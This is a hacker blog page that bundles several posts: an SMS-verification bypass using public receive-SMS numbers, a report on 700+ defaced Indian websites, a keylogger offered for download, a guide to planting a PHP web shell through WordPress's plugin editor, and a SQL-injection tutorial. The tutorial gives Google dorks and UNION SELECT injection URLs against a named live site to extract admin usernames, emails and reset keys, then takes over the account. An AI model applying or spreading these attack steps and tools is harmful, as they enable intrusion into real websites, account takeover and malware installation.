Friday, 6 February 2015
How to Bypass SMS Verification of Any Website
How to Bypass SMS Verification of Any Website
In This Tutorial I will Tell you how to Bypass Phone or SMS Verification on any Website. Now a Day many Websites (Google, Facebook etc.) are Using Phone/SMS Verification System after reading This Tutorial You will be Able to Bypass those Verification system easily so Lets Start...
1. When you asked to Enter the Phone Number Goto Receive-SMS-Online and Select you Number and Enter That Where Ever You are Asked to Enter the Phone Number.
2. Now Open That Number which you Selected and Enter for Verification
3. Simply come back and click the number which you have selected, check it out there is your code sent by Verification System.
700+ websites get hacked by Modi ‘fan’ to support Narendra Modi
700+ websites get hacked by Modi ‘fan’ to support Narendra Modi
Narendra Modi, Gujarat's chief minister and the next PM candidate of the India. And he has so many supporters from the youngsters and now a days he is also gets the supports from the hackers.
Hacker have hacked and defaced 700+ Indian websites to support and promote Narendra Modi.
The list of the hacked website is here.
You can check out the defacement image in the above snapshot. The message written in the defaced website is “ whatever you fail to detect, will cause your downfall..
Narendra Modi fan is here to tell you the truth.. no one is here like Narendra Modi and thats why sonia gandhi and rahul always barking about Narendra Modi and you all know about aam aadmi party who don’t know what they have to do and waht not always one word dharne par bheth jayenge lol! we just defaced this site to give you a message vote for MODI! ”[tool] Syslogger
AMY H4CK3R was here
you all know guyz is a best powerful keylogger thats why i m sharing this tool with you guys
its a very nice keylogger ever
you all know guyz is a best powerful keylogger thats why i m sharing this tool with you guys
its a very nice keylogger ever
Download
Thursday, 10 April 2014
[Shelling] Wordpress
Hi all!
Today i'm going to show you how to upload shell in Wordpress software.
You will need:
1) Admin access to Worpress panel
2) Any php shell
First you need to go to:
Plugins -> Editor
![[Image: regiontt.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sPkoGoxyl5-Ollbqd3YvsYl13RocWMzktkhsTts0lkSqn_iPyI9SXOZq3uLog89ItibenOxGk6rEMMJG3mBT7U6HuE9NvNoXOf26_-Dsn_XG_9qZeV=s0-d)
Once there you can edit plugins installed on the site.
Choose any plugin you want...
![[Image: regionhs.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ujtmMmj0xbDk7fvoAE2rJXz9kGmvrC8k9xoaWZgHOioHghrm6FFjZV4b6gI6-q73TPliH1tvBmLgKvg3oKXOLsoZJCqgCiBEln7xQjMEpdXGEzCPqCv0g=s0-d)
For example i selected "Server buddy"
Now select one file from right site (It must be .PHP file)
![[Image: regioncq.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vo4LpTFXa7EtrlXbLCOMYCGWwayNjpLLvZA6cPkR27dqiOOKlzGN-hpwmBq8a8WJU0enCodEMTVD8AEgQtL-iAVRyka38tdEzydb_xuyeVFawT0XLbS2c=s0-d)
When select you can edit it now.
Take your shell source and paste it there.
Now just save it. (If you got an error try other file,or simply you can't edit plugins)
![[Image: regionkc.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_veR3Uem9HQQ2f6Kkg34DqTUKpxS3oXEZ9lPZL3wrnsOr-OBkxBH-_sU8tD9HOjlA5y5XgtYmiRc20iJ-K9m9aZIFwfoCC9u7jYXjT6dOxcS16iwJmM=s0-d)
You just need to access it now.
By default template in wordpress are located in:
We know our folder and name of the plugin we edited.
![[Image: regionzt.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tUfFpYrSWvG5_RcvTgwc4X0MreO3Bhz0bFUOtlBJw2qHsOdda3Sz8LfV7F6m6rrAWigmtUGMaqqWl8vIZVsTT0wEtDvtq2aLgkXLHezrQ_6XgYeqWwVhw=s0-d)
So our final link would be
![[Image: regionj.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t303xtuRWOMlHddJyG9WazUYwoqm6r83cI-CUW7nSJrPN-nUtPOna50HNvlD30hEwCNH4_GIU_ImxqtknFm5c0vnnlHm8GQtAuBxfiNeHpPgME4r-dYg=s0-d)
![[Image: regionqc.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_urXCWUovNK5gNMTcEOePsoTAHi7QbFxzgSrha6zBo4RVhSkOf-kB4h09C30I1fbNqnA4UcBblYpzsNMZBensq4rb2UXb6Ubb9KwF9Be3CqOKQEGKLG=s0-d)
That would be all for today... :)
Today i'm going to show you how to upload shell in Wordpress software.
You will need:
1) Admin access to Worpress panel
2) Any php shell
First you need to go to:
Plugins -> Editor
Once there you can edit plugins installed on the site.
Choose any plugin you want...
For example i selected "Server buddy"
Now select one file from right site (It must be .PHP file)
When select you can edit it now.
Take your shell source and paste it there.
Now just save it. (If you got an error try other file,or simply you can't edit plugins)
You just need to access it now.
By default template in wordpress are located in:
Code:
www.site.com/wp-content/plugins/pluginname/pluginfile.phpWe know our folder and name of the plugin we edited.
So our final link would be
Code:
www.site.com/wp-content/plugins/serverbuddy-by-pluginbuddy/serverbuddy.phpThat would be all for today... :)
[Tutorial] Hack WordPress site with SQL injection
Hack WordPress site with SQL injection
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
So lets begin.
I will use this 0day here by AMY hacker.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3When i add ' text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.phpAnd press "Lost your password?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=usernameNOTE: Replace key= & login=
So my link will be:
Enter new password:
Login with new password and shell it.
That's it guys.
Thanks for reading!









.bmp)